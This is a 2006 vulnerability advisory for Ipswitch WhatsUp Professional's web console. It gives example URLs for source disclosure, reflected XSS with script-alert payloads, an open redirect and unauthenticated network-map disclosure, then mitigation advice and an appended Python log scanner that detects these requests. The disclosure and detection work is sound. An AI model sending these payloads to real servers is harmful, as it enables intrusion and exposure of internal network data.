Ipswitch WhatsUp Professional multiple flaws

Vulnerability ID 1053250 Vulnerability type
Published 2006-05-17 Updated 2006-05-17
CVE ID CVE-2006-2357
CVE-2006-2356
CVE-2006-2353
CVE-2006-2351
CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006050094
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
WhatsUp is a tool from Ipswitch for monitoring applications and networks.
It embeds a custom web server on port 8022.

Description:

This custom web server is prone to multiple flaws.

-as an authenticated user:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*there are many XSS flaws, such as
http://server:8022/NmConsole/Navigation.asp?sDeviceView=<SCRIPT>alert("me");</SCRIPT>&nDeviceID=<SCRIPT>alert("me");</SCRIPT>
http://server:8022/NmConsole/ToolResults.asp?bIsIE=true&nToolType=0&sHostname=%3cscript%3ealert('me')%3c/script%3e&nTimeout=2000&nCount=1&nSize=32&btnPing=Ping

*redirection
http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.asp&sCancelURL=http://www.google.fr

-without being authenticated:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*network nodes information disclosure (name, internal addr, service)
http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0

The weaknesses have been confirmed in version 2006; the source disclosure
is also present in versions 2005 and 2005 SP1.
Other versions may also be affected.

No response from vendor.

Solution:
-Filter TCP port 8022, and ask the vendor for a patch if you are a registered user
-Keep an eye on an open-source project: http://gnms.rubyforge.org

David Maciejak
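
A defender-side check for the request patterns listed in the advisory, as an added example that is not part of the original advisory or of the vendor's code: it scans access-log lines for the trailing-dot .asp request, markup in query values, absolute URLs in sRedirectUrl/sCancelURL, and RenderMap.asp requests. The Common Log Format input (for instance from a proxy placed in front of port 8022), the finding labels and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: Common Log Format lines, e.g. from a proxy in front of port 8022.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)  # start of a tag in a decoded value
ABSOLUTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # scheme://host or //host
REDIRECT_PARAMS = {"sredirecturl", "scancelurl"}

def classify(target):
    """Return sorted finding labels (hypothetical names) for one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if not path.startswith("/nmconsole/"):
        return []
    found = set()
    if re.search(r"\.asp\.+$", path):  # Login.asp. style request
        found.add("source-disclosure")
    if path.endswith("/utility/rendermap.asp"):  # review: was there a session?
        found.add("map-request")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP.search(value):  # parse_qsl has already URL-decoded the value
            found.add("xss")
        if name.lower() in REDIRECT_PARAMS and ABSOLUTE.match(value):
            found.add("open-redirect")
    return sorted(found)

def scan(lines):
    """Return (client, target, findings) for every log line with a finding."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (findings := classify(m.group(2))):
            hits.append((m.group(1), m.group(2), findings))
    return hits

# Constructed sample log lines (not captured traffic); request targets follow the advisory.
LOG = '{ip} - - [17/May/2006:10:00:00 +0000] "GET {t} HTTP/1.1" 200 512'
SAMPLE = [LOG.format(ip=ip, t=t) for ip, t in [
    ("192.0.2.10", "/NmConsole/Login.asp"),
    ("192.0.2.11", "/NmConsole/Login.asp."),
    ("192.0.2.12", "/NmConsole/ToolResults.asp?nToolType=0&sHostname=%3cscript%3ealert('me')%3c/script%3e"),
    ("192.0.2.13", "/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.asp&sCancelURL=http://www.example.com"),
    ("192.0.2.14", "/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0"),
]]

if __name__ == "__main__":
    for client, target, findings in scan(SAMPLE):
        print(client, ",".join(findings), target)
```

A "map-request" hit is only a lead: the log line alone does not show whether the request carried a valid session, so correlate it with authentication records.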